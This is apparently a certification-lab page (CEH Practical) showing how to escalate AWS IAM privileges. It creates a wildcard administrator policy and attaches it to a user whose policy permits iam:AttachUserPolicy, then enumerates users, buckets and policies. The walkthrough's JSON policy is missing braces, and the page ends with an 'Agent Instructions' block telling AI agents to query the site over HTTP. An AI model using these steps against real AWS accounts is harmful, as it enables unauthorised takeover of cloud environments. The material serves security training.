# 4. Perform Privilege Escalation to Gain Higher Privileges ## 1. Escalata IAM privilege by exploiting misconfigured user policy A policy is an entity that, when attached to an identity or resource, defines its permissions. You can use the AWS Management Console, AWS CLI, or AWS API to create customer-managed policies in IAM. Customer-managed policies are standalone policies that you administer in your AWS account. You can then attach the policies to the identities (users, groups, and roles) in your AWS account. If the user policies are not configured properly, they can be exploited by attackers to gain full administrator access to the target user’s AWS account. Before starting this task, create an **IAM** user (**Test**) with default settings and create a policy (**Test**) with permissions including, iam:AttachUserPolicy, iam:ListUserPolicies, sts:AssumeRole, and iam:ListRoles, as shown in the below screenshot. These policies can be exploited by attackers to gain administrator-level privileges.

In the terminal window, type **vim user-policy.json** and press **Enter**. > This command will create a file named **user-policy** in the **attacker** directory.

A command line text editor appears; press **I** and type the script given below: ``` "Version":"2012-10-17", "Statement": [ "Effect":"Allow", "Action":"*", "Resource":"*" } ] ``` This is an AdministratorAccess policy that gives administrator access to the target IAM user. After entering the script given in the previous step, press the **Esc** button. Then, type **:wq!** and press **Enter** to save the text document.

Now, we will attach the created policy (**user-policy**) to the target IAM user’s account. To do so, type ``` aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json ``` The created user policy is displayed, showing various details such as **PolicyName**, **PolicyId**, and **Arn**

In the terminal, type ``` aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy ``` The above command will attach the policy (**user-policy**) to the target IAM user account (here, **test**).

Now, type ``` aws iam list-attached-user-policies --user-name ``` It will show all attached policies. The result appears, displaying the attached policy name (**user-policy**), as shown in the screenshot.

Now that you have successfully escalated the privileges of the target IAM user account, you can list all the IAM users in the AWS environment. To do so, type **aws iam list-users** and press **Enter**.

Similarly, you can use various commands to obtain complete information about the AWS environment such as the list of S3 buckets, user policies, role policies, and group policies, as well as to create a new user. * List of S3 buckets: **aws s3api list-buckets --query "Buckets\[].Name"** * User Policies: **aws iam list-user-policies** * Role Policies: **aws iam list-role-policies** * Group policies: **aws iam list-group-policies** * Create user: **aws iam create-user** {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ceh-practical.cavementech.com/module-19.-cloud-computing/4.-perform-privilege-escalation-to-gain-higher-privileges.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.